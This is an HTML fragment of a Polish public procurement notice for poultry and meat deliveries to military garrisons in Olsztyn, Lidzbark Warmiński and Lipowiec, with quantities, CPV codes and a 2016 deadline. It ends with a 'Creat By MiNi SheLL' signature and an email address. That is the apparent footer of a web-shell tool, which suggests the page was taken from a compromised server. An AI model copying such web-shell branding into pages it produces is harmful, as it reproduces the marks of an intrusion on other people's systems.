<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są dostawy mięsa czerwonego,  wędlin   z mięsa czerwonego tłuszczy zwierzęcych, wędlin z mięsa drobiowego  oraz mięsa drobiowego zwanych dalej środkami spożywczymi lub produktami, do garnizonu Lipowiec powiat Szczytno, zgodnie z opisem przedmiotu zamówienia zawartym w SIWZ w następującym asortymencie i ilościach: Antrykot wołowy b/k kręg - 50 kg, Wołowina zrazowa b/k- 100 kg, Karkówka wieprzowa b/k -100 kg, Łopatka wieprzowa b/k- 100 kg, Schab wieprzowy b/k- 100 kg, Żeberka wieprzowe- 80 kg, Szynka wieprzowa b/k- 100 kg, Mięso wieprzowe od szynki b/k drobne-80 kg, Golonka wieprzowa z/k- 50 kg,Wątroba wieprzowa- 20 kg, Pasztetowa- 30 kg, Salceson włoski- 20 kg. Salceson ozorkowy - 20 kg, Kaszanka z kaszy gryczanej- 30 kg, Kiełbasa szynkowa wołowa specjalna- 6 kg, Kiełbasa myśliwska- 80 kg, Kiełbasa jałowcowa- 80kg, Kiełbasa parówkowa specjalna- 80 kg, Parówki specjalne- 80 kg, Mortadela specjalna- 50 kg, Kiełbasa biała parzona specjalna- 80 kg, Kiełbasa podlaska specjalna- 80 kg, Kiełbasa wojskowa specjalna- 80 kg, , Kiełbasa śląska specjalna - 80 kg, Kiełbasa toruńska specjalna- 60 kg, Kiełbasa zwyczajna specjalna- 60 kg, Kiełbasa krakowska parzona specjalna- 60 kg, Kiełbasa szynkowa wieprzowa specjalna- 60 kg, Kiełbasa krakowska sucha- 50 kg, Kiełbasa żywiecka- 80kg, Kabanosy- 80 kg, Baleron- 80 kg, Polędwica wędzona wieprzowa- 10 kg, Polędwica wieprzowa sopocka- 20 kg, Szynka wieprzowa wędzona- 40 kg, Szynka wieprzowa gotowana- 50 kg, Szynka wieprzowa mielona- 50kg, Szynka wieprzowa konserwowa- 50 kg, Boczek wędzony parzony b/k- 80 kg, Pasztet wieprzowy pieczony- 6 kg, Rolada z boczku- 6 kg, Golonka wieprzowa- 20 kg, Ogonówka- 20 kg, Kabanosy drobiowe- 6 kg, Kiełbasa szynkowa drobiowa-10 kg, Kiełbasa krakowska drobiowa-  6 kg,  Parówki drobiowe - 50 kg, Szynka drobiowa- 30 kg, Szynka z indyka -30 kg, Mortadela drobiowa -30 kg, Smalec wieprzowy- 30kg, Słonina - 20 kg. 2.	Dostawy mięsa czerwonego, wędlin z mięsa czerwonego, tłuszczy zwierzęcych, wędlin z mięsa drobiowego  oraz mięsa drobiowego będą realizowane sukcesywnie. 
3.	Zamawiający przewiduje zastosowanie opcji. Opcja - dostarczanie do Odbiorców środków spożywczych na wezwanie Zamawiającego, w ilościach przez niego wskazanych w terminie realizacji umowy oraz i cenach jednostkowych określonych               w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.41.21.00-0, 15.13.11.35-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawy mięsa drobiowego do Odbiorcy w miejscowości (garnizonie) Olsztyn.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są dostawy mięsa drobiowego do Odbiorcy w miejscowości (garnizonie) Olsztyn,  zwanych dalej środkami spożywczymi lub produktami, do garnizonu Olsztyn, zgodnie z opisem przedmiotu zamówienia zawartym w SIWZ w następującym asortymencie i ilościach: Noga z kurczaka- 500 kg, Filet z piersi kurczaka  - 500 kg, Filet z piersi indyka -20 kg, Wątroba z kurczaka - 20 kg, Żołądki kurczaka- 20 kg.2.	Dostawy mięsa czerwonego, wędlin z mięsa czerwonego, tłuszczy zwierzęcych, wędlin z mięsa drobiowego  oraz mięsa drobiowego będą realizowane sukcesywnie. 
3.	Zamawiający przewiduje zastosowanie opcji. Opcja - dostarczanie do Odbiorców środków spożywczych na wezwanie Zamawiającego, w ilościach przez niego wskazanych w terminie realizacji umowy oraz i cenach jednostkowych określonych               w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawy mięsa drobiowego do Odbiorcy w miejscowości (garnizonie)  Lidzbark Warmiński.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są dostawy mięsa drobiowego do Odbiorcy w miejscowości (garnizonie)  Lidzbark Warmiński zwanych dalej środkami spożywczymi lub produktami, zgodnie z opisem przedmiotu zamówienia zawartym w SIWZ w następującym asortymencie i ilościach: Noga z kurczaka- 480 kg, Filet z piersi kurczaka  - 280 kg, Filet z piersi indyka -80 kg, Wątroba z kurczaka - 80 kg, Żołądki kurczaka- 20 kg. 2.	Dostawy mięsa czerwonego, wędlin z mięsa czerwonego, tłuszczy zwierzęcych, wędlin z mięsa drobiowego  oraz mięsa drobiowego będą realizowane sukcesywnie. 
3.	Zamawiający przewiduje zastosowanie opcji. Opcja - dostarczanie do Odbiorców środków spożywczych na wezwanie Zamawiającego, w ilościach przez niego wskazanych w terminie realizacji umowy oraz i cenach jednostkowych określonych               w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawy mięsa drobiowego do Odbiorcy w miejscowości (garnizonie) Lipowiec, powiat Szczytno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są dostawy mięsa drobiowego do Odbiorcy w miejscowości (garnizonie) Lipowiec, powiat Szczytno, zwanych dalej środkami spożywczymi lub produktami , zgodnie z opisem przedmiotu zamówienia zawartym w SIWZ w następującym asortymencie i ilościach:  Noga z kurczaka- 100 kg, Filet z piersi kurczaka  - 60 kg, Filet z piersi indyka -10 kg, Wątroba z kurczaka - 20 kg, Żołądki kurczaka- 20 kg. 2.	Dostawy mięsa czerwonego, wędlin z mięsa czerwonego, tłuszczy zwierzęcych, wędlin z mięsa drobiowego  oraz mięsa drobiowego będą realizowane sukcesywnie. 
3.	Zamawiający przewiduje zastosowanie opcji. Opcja - dostarczanie do Odbiorców środków spożywczych na wezwanie Zamawiającego, w ilościach przez niego wskazanych w terminie realizacji umowy oraz i cenach jednostkowych określonych               w formularzu cenowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com